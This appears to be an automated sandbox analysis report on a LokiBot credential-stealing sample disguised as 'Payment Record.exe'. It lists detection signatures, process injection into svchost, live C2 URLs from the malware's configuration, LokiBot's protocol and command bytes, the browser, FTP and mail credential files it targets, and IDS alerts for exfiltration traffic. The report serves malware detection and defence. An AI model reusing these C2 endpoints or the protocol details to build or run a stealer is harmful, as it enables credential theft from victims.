Edit tour

Windows Analysis Report
Payment Record.exe

Overview

General Information

Sample name:	Payment Record.exe
Analysis ID:	1630614
MD5:	dd113368367877e6e6e2c38d1793629e
SHA1:	a009d3de4a591b136a2b6128fad0e00bb72cb513
SHA256:	4f2274eda30670db71874bec8a27f08a103472c6dea4e1df892d621f05edaaf7
Tags:	exeuser-threatcat_ch
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Lokibot

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

Yara detected aPLib compressed binary

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Payment Record.exe (PID: 5952 cmdline: "C:\Users\user\Desktop\Payment Record.exe" MD5: DD113368367877E6E6E2C38D1793629E)

svchost.exe (PID: 320 cmdline: "C:\Users\user\Desktop\Payment Record.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://0xmrmagnezi.github.io/malware%20analysis/LokiBot/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.3366643257.0000000003000000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.2129598847.0000000001080000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.3366156712.0000000000400000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
Process Memory Space: Payment Record.exe PID: 5952	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Payment Record.exe PID: 5952	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Payment Record.exe PID: 5952	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Payment Record.exe PID: 5952	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x8cbde:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: svchost.exe PID: 320	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: svchost.exe PID: 320	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: svchost.exe PID: 320	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: svchost.exe PID: 320	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x2317:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 20 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Payment Record.exe.1080000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Payment Record.exe.1080000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Payment Record.exe.1080000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Payment Record.exe.1080000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.Payment Record.exe.1080000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Payment Record.exe.1080000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Payment Record.exe.1080000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Payment Record.exe.1080000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Payment Record.exe.1080000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Payment Record.exe.1080000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Payment Record.exe.1080000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Payment Record.exe.1080000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Payment Record.exe.1080000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.svchost.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
2.2.svchost.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.svchost.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
2.2.svchost.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.svchost.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.svchost.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.svchost.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.2.svchost.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.svchost.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 24 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Payment Record.exe", CommandLine: "C:\Users\user\Desktop\Payment Record.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Record.exe", ParentImage: C:\Users\user\Desktop\Payment Record.exe, ParentProcessId: 5952, ParentProcessName: Payment Record.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payment Record.exe", ProcessId: 320, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\Payment Record.exe", CommandLine: "C:\Users\user\Desktop\Payment Record.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Record.exe", ParentImage: C:\Users\user\Desktop\Payment Record.exe, ParentProcessId: 5952, ParentProcessName: Payment Record.exe, ProcessCommandLine: "C:\Users\user\Desktop\Payment Record.exe", ProcessId: 320, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-06T04:03:46.500574+0100	2024312	1	A Network Trojan was detected	192.168.2.6	49709	104.21.16.1	80	TCP
2025-03-06T04:03:48.473141+0100	2024312	1	A Network Trojan was detected	192.168.2.6	49710	104.21.16.1	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-06T04:03:45.735358+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49709	104.21.16.1	80	TCP
2025-03-06T04:03:47.665765+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49710	104.21.16.1	80	TCP
2025-03-06T04:03:48.542508+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49711	104.21.16.1	80	TCP
2025-03-06T04:03:50.566688+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49713	104.21.16.1	80	TCP
2025-03-06T04:03:52.446459+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49714	104.21.16.1	80	TCP
2025-03-06T04:03:54.361622+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49720	104.21.16.1	80	TCP
2025-03-06T04:03:56.390014+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49726	104.21.16.1	80	TCP
2025-03-06T04:03:58.316473+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49732	104.21.16.1	80	TCP
2025-03-06T04:04:00.195263+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49737	104.21.16.1	80	TCP
2025-03-06T04:04:02.151058+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49742	104.21.16.1	80	TCP
2025-03-06T04:04:04.265359+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49749	104.21.16.1	80	TCP
2025-03-06T04:04:06.201744+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49755	104.21.16.1	80	TCP
2025-03-06T04:04:08.125482+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49761	104.21.16.1	80	TCP
2025-03-06T04:04:10.062674+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49766	104.21.16.1	80	TCP
2025-03-06T04:04:11.988824+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49768	104.21.16.1	80	TCP
2025-03-06T04:04:13.900262+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49774	104.21.16.1	80	TCP
2025-03-06T04:04:15.812629+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49780	104.21.16.1	80	TCP
2025-03-06T04:04:17.719575+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49786	104.21.16.1	80	TCP
2025-03-06T04:04:19.687413+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49790	104.21.16.1	80	TCP
2025-03-06T04:04:21.613325+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49793	104.21.16.1	80	TCP
2025-03-06T04:04:23.536257+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49799	104.21.16.1	80	TCP
2025-03-06T04:04:25.425745+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49805	104.21.16.1	80	TCP
2025-03-06T04:04:27.347257+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49810	104.21.16.1	80	TCP
2025-03-06T04:04:29.224142+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59051	104.21.16.1	80	TCP
2025-03-06T04:04:31.359423+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59055	104.21.16.1	80	TCP
2025-03-06T04:04:33.266425+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59060	104.21.16.1	80	TCP
2025-03-06T04:04:35.188451+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59066	104.21.16.1	80	TCP
2025-03-06T04:04:37.317190+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59071	104.21.16.1	80	TCP
2025-03-06T04:04:39.236859+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59077	104.21.16.1	80	TCP
2025-03-06T04:04:41.158663+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59081	104.21.16.1	80	TCP
2025-03-06T04:04:43.126252+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59086	104.21.16.1	80	TCP
2025-03-06T04:04:45.054916+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59091	104.21.16.1	80	TCP
2025-03-06T04:04:47.227160+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59096	104.21.16.1	80	TCP
2025-03-06T04:04:49.029554+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59102	104.21.16.1	80	TCP
2025-03-06T04:04:51.034762+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59107	104.21.16.1	80	TCP
2025-03-06T04:04:52.984767+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59111	104.21.16.1	80	TCP
2025-03-06T04:04:54.931565+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59116	104.21.16.1	80	TCP
2025-03-06T04:04:56.957167+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59121	104.21.16.1	80	TCP
2025-03-06T04:04:58.912947+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59127	104.21.16.1	80	TCP
2025-03-06T04:05:00.845623+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59131	104.21.16.1	80	TCP
2025-03-06T04:05:02.800675+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59136	104.21.16.1	80	TCP
2025-03-06T04:05:04.838430+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59142	104.21.16.1	80	TCP
2025-03-06T04:05:06.783994+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59147	104.21.16.1	80	TCP
2025-03-06T04:05:08.672822+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59152	104.21.16.1	80	TCP
2025-03-06T04:05:10.548245+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59156	104.21.16.1	80	TCP
2025-03-06T04:05:12.425406+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59161	104.21.16.1	80	TCP
2025-03-06T04:05:14.378001+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59167	104.21.16.1	80	TCP
2025-03-06T04:05:16.332459+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59171	104.21.16.1	80	TCP
2025-03-06T04:05:18.189655+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59176	104.21.16.1	80	TCP
2025-03-06T04:05:20.069802+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59181	104.21.16.1	80	TCP
2025-03-06T04:05:22.004551+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59186	104.21.16.1	80	TCP
2025-03-06T04:05:23.925500+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59191	104.21.16.1	80	TCP
2025-03-06T04:05:25.862053+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59196	104.21.16.1	80	TCP
2025-03-06T04:05:27.738975+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59202	104.21.16.1	80	TCP
2025-03-06T04:05:29.713587+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59206	104.21.16.1	80	TCP
2025-03-06T04:05:31.626941+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59212	104.21.16.1	80	TCP
2025-03-06T04:05:33.509861+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59216	104.21.16.1	80	TCP
2025-03-06T04:05:35.331358+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59221	104.21.16.1	80	TCP
2025-03-06T04:05:37.592679+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59227	104.21.16.1	80	TCP
2025-03-06T04:05:39.502540+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59231	104.21.16.1	80	TCP
2025-03-06T04:05:41.440392+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59237	104.21.16.1	80	TCP
2025-03-06T04:05:43.331199+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59240	104.21.16.1	80	TCP
2025-03-06T04:05:45.266738+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	59246	104.21.16.1	80	TCP
